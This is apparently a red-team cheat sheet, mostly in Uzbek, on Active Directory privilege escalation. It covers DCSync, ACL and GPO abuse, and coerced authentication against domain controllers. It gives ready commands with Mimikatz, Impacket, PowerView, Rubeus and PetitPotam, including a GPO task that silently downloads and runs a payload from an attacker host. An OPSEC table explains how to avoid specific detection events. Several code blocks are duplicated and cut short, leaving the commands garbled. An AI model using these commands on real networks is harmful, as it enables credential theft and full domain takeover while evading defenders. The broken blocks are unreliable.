Privilege Escalation
PrivEsc OPSEC
DCSync, ACL Abuse, Delegation, Token Impersonation
DCSync (Directory Replication Service)
DC dan to'g'ridan-to'g'ri parol hashlarini replikatsiya qilish. DS-Replication-Get-Changes va DS-Replication-Get-Changes-All huquqlari talab qilinadi.
OPSEC ogohlantirish: Oddiy workstationdan DCSync darhol SOC alertini triggerlaydigan (Event ID 4662). Exchange server yoki mavjud DC dan bajaring.
PowerShell / BashPowerShell / Bash
# [In-Memory] Mimikatz ni disk ga tushirmasdan DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /user:krbtgt"'
# [Impacket] AES kalit bilan remote DCSync (NTLM Logon Type 3 alertidan qochish)
secretsdump.py domain.local/Administrator@DC_IP `
-aesKey -just-dc-user krbtgt
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.local /user:krbtgt"'
# [Impacket] AES kalit bilan remote DCSync (NTLM Logon Type 3 alertidan qochish)
secretsdump.py domain.local/Administrator@DC_IP `
-aesKey
ACL & GPO Abuse
Noto'g'ri sozlangan DACL (Discretionary ACL) larni ekspluatatsiya qilib imtiyozlarni oshirish.
GenericAll bermaslik — GenericWrite yoki WriteDACL yashirinroq va AD audit paytida kamroq ko'zga tashlanadi.
PowerShellPowerShell
# [GenericAll] Yashirin parol reset
Set-DomainUserPassword -Identity targetuser -AccountPassword "HackerPass123!"
# [GenericWrite] Targeted Kerberoasting — fake SPN qo'shish
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='hacker/target'}
# [GPO Abuse] GenericAll/WriteProperty ega bo'lsangiz malicious task deploy qilish
New-GPOImmediateTask -TaskName "Update" -Command "powershell.exe" `
-CommandArguments "-nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content" `
-TargetGpoName "AppLocker Policy"
Set-DomainUserPassword -Identity targetuser -AccountPassword "HackerPass123!"
# [GenericWrite] Targeted Kerberoasting — fake SPN qo'shish
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='hacker/target'}
# [GPO Abuse] GenericAll/WriteProperty ega bo'lsangiz malicious task deploy qilish
New-GPOImmediateTask -TaskName "Update" -Command "powershell.exe" `
-CommandArguments "-nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content" `
-TargetGpoName "AppLocker Policy"
Unconstrained Delegation & Coerced Auth
Yuqori imtiyozli account (DC kabi) ni siz nazorat qilgan mashinaga autentifikatsiya qilishga majburlash — uning TGT sini ushlash.
SpoolSample.exe (Print Spooler) o'rniga PetitPotam (MS-EFSR) ishlating — Event 5145 da kamroq ko'zga tashlanadi.
PowerShellPowerShell
# Unconstrained Delegation hostlarini topish
Get-DomainComputer -Unconstrained | Select-Object name
# Kiruvchi TGT larni xotirada kutib olish
.\Rubeus.exe monitor /interval:5 /nowrap
# DC ni autentifikatsiyaga majburlash — PetitPotam (MS-EFSR)
Invoke-PetitPotam -CaptureServer -Target
Get-DomainComputer -Unconstrained | Select-Object name
# Kiruvchi TGT larni xotirada kutib olish
.\Rubeus.exe monitor /interval:5 /nowrap
# DC ni autentifikatsiyaga majburlash — PetitPotam (MS-EFSR)
Invoke-PetitPotam -CaptureServer
OPSEC Notes & Telemetry Matrix
| Texnika | Risk | EDR Telemetry | OPSEC Yechim |
|---|---|---|---|
| DCSync (Workstationdan) | Critical | Event 4662 (Directory Service Access) non-DC IPdan. | Exchange yoki mavjud DC dan bajaring. |
| Token Impersonation | Medium | Process injection anomaliyalari. | Native Win32 API (LogonUser) ishlating. |
| S4U Delegation (RC4) | High | Ticket Encryption Type 0x17 (RC4). | Har doim AES (0x12) ishlating. |
| Print Spooler (MS-RPRN) | High | Event 5145. Kuchli monitoring. | MS-EFSR (PetitPotam) ishlating. |
| GPO Modification | Medium | Event 5136 (Directory Service Changes). | Sysadmin faoliyati bilan qorishib ketadi. |